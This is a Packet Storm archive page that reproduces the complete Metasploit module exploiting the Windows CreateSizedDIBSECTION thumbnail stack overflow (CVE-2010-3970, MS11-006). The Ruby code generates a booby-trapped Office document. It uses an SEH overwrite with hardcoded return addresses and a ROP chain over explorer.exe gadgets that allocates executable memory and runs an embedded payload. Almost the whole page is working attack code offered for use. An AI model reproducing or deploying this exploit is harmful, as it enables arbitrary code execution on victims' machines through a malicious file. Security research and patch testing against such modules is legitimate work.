exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows CreateSizeDIBSECTION Stack Buffer Overflow

Microsoft Windows CreateSizeDIBSECTION Stack Buffer Overflow
Posted Feb 10, 2011
Authored by Yaniv Miron, jduck, Moti, Xu Hao | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the "Thumbnails" view.

tags | exploit, overflow, arbitrary, code execution
advisories | CVE-2010-3970, OSVDB-70263
SHA-256 | ff0746ba8e2fc6963fae334d5cae3d633461ec95d7ca6d6099761907cf4797c4

Microsoft Windows CreateSizeDIBSECTION Stack Buffer Overflow

Change Mirror Download
##
# $Id: ms11_006_createsizeddibsection.rb 11730 2011-02-08 23:31:44Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of thumbnails
within .MIC files and various Office documents. When processing a thumbnail bitmap
containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This
leads to arbitrary code execution.

In order to trigger the vulnerable code, the folder containing the document must be
viewed using the "Thumbnails" view.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Moti & Xu Hao', # original discovery
'Yaniv Miron aka Lament of ilhack',
'jduck' # Metasploit module
],
'Version' => '$Revision: 11730 $',
'References' =>
[
[ 'CVE', '2010-3970' ],
[ 'OSVDB', '70263' ],
[ 'MSB', 'MS11-006' ],
[ 'BID', '45662' ],
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2490606.mspx' ],
[ 'URL', 'http://www.powerofcommunity.net/schedule.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
'DisableNops' => true # no need
},
'Platform' => 'win',
'Targets' =>
[
# This automatic target will combine all targets into one file :)
[ 'Automatic', { } ],

# Windows 2000 is a soft target... You're not still using it are you?
[ 'Windows 2000 SP0/SP4 English',
{
'Offset' => 1548, # Offset to SEH frame
'Ret' => 0x75022ac4 # p/p/r ws2help.dll v5.0.2134.1
}
],

# My test machine didn't have l3codeca.acm loaded (as mentioned in their slides)
# However, it did have msacm32.drv
[ 'Windows XP SP3 English',
{
'Offset' => 1560, # Offset to SEH frame
# Address from msacm32.drv v5.1.2600.0
'Ret' => 0x72d11676, # push esi / mov esi,[esp+0xc] / push [esi+0x54] / call [esi+0x5c]

# This ends up becoming eip due to above SafeSEH bypass
'PivotOffset' => 1652,
'RopStart' => 592
}
],

=begin
[ 'Windows Server 2003 SP2',
{
'Offset' => 1576, # Offset to SEH frame
'Ret' => 0xfeedfed5

# rop is possible with l3codeca.acm, but its not clear how to force it to be loaded.
# Also, it changed in Feburary 2010 ...
}
],
=end

# crash on a deref path to heaven.
[ 'Crash Target for Debugging',
{
'Offset' => 1337,
'Ret' => 0xdac0ffee
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2010'))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
], self.class)
end

def exploit

print_status("Creating '#{datastore['FILENAME']}' file ...")

out = ::File.expand_path(::File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
raise RuntimeError, 'Unable to create output file'
end

stm = stg.create_stream("\x05SummaryInformation")
if (not stm)
raise RuntimeError, 'Unable to create SummaryInformation stream'
end
stm << generate_summaryinfo()
stm.close

stg.close

print_status("Generated output file #{out}")

end

def generate_summaryinfo
si = Rex::OLE::PropertySetStream.new

ps = Rex::OLE::PropertySet.new(Rex::OLE::FMTID_SummaryInformation)

bihdr = [
0x08, # ??
0x28, # biSize (struct size)
0x50, # biWidth
0x58, # biHeight
0x01, # biPlanes
0x08, # biBitCount
0x00, # biCompression
0xa8c0, # biSizeImage
0x00, # biXPelsPerMeter
0x00, # biYPelsPerMeter
# biClrUsed
0x80000001,
0x00 # biClrImportant
].pack('VVVVvvVVVVVV')

# ClipboardData
data = rand_text(8192)
data[0, bihdr.length] = bihdr
data[48, payload.encoded.length] = payload.encoded

if target.name == "Automatic"
targets.each { |t|
next if t.name !~ /Windows/i

add_target(data, t)
}
else
add_target(data, target)
end

prop = Rex::OLE::Property.new(Rex::OLE::PIDSI_THUMBNAIL, Rex::OLE::VT_CF, data)
ps << prop
si << ps

si.pack
end

def add_target(data, targ)
if targ['PivotOffset'] and targ['RopStart']
data[targ['Offset'] + 4, 4] = [targ.ret].pack('V')

rvas = rvas_explorer_xpsp3()
rop = generate_rop(rvas)

pivot = rva2addr(rvas, 'add ebp, [edx+6] / pop eax / leave / ret 4')
data[targ['PivotOffset'], 4] = [pivot].pack('V')

data[targ['RopStart'], rop.length] = rop
else
seh = generate_seh_record(targ.ret)
distance = targ['Offset'] + seh.length
distance -= 48 # the entire source buffer isn't copied
seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

data[targ['Offset'], seh.length] = seh
end
end

def rvas_explorer_xpsp3()
# explorer.exe version v6.0.2900.5512
# Just return this hash
{
'add ebp, [edx+6] / pop eax / leave / ret 4' => 0x2be9c,
'ret' => 0x3ebd,

'int3 / ... / ret' => 0x1922f,

'mov eax, esi / pop edi / pop esi / ret' => 0x2648,
'pop ebp / ret' => 0x3ebc,
'add eax, ebp / ret' => 0x13124,
'mov eax, [eax] / ret' => 0x74b7,

'pop ebx / ret' => 0x4bd5,
'push eax / call ebx' => 0xedc7,
'pop edi / pop esi / ret' => 0x23bb,

'pop ecx / ret' => 0x1acd9,
'call [ecx] / pop ebp / ret 0x10' => 0x2ad52,

'pop edi / ret' => 0x319bc,

'lea edi, [eax+0x1c] / rep movsd / pop edi / pop esi / ret' => 0x88c4,

'mov [eax], ecx / pop ebp / ret 4' => 0xa747,
'jmp eax' => 0x2080
}
end

def generate_rop(rvas)
# ROP fun! (XP SP3 English, Dec 29 2010)
rvas.merge!({
# Instructions / Name => RVA
'BaseAddress' => 0x01000000,
'imp_VirtualAlloc' => 0x11e8,
'Scratch' => 0x46060
})

rop_stack = [
'ret',
:unused, # from pivot

# First, get the address of our source buffer in relation to the
# SEH record pointer now saved in ESI
'mov eax, esi / pop edi / pop esi / ret',
:unused,
:unused,

'pop ebp / ret',
0xfffffa18,
'add eax, ebp / ret',

'pop ebx / ret',
'pop edi / pop esi / ret',
'push eax / call ebx',

# Allocate an RWX memory segment
'pop ecx / ret',
'imp_VirtualAlloc',

'call [ecx] / pop ebp / ret 0x10',
0, # lpAddress
0x1000, # dwSize
0x3000, # flAllocationType
0x40, # flProt
:unused,

# Copy the original payload
'pop ecx / ret',
:unused,
:unused,
:unused,
:unused,
0x80, # dwords to copy

'lea edi, [eax+0x1c] / rep movsd / pop edi / pop esi / ret',
:unused,
:unused,

# Add a jump over the space/crap
'pop ecx / ret',
0x90901aeb,

'mov [eax], ecx / pop ebp / ret 4',
:unused,

'jmp eax'
]

rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
rvas['BaseAddress'] + rvas[e]

elsif e == :unused
# Randomize
rand_text(4).unpack('V').first

else
# Literal
e
end
}

rop_stack.pack('V*')
end

def rva2addr(rvas, key)
raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close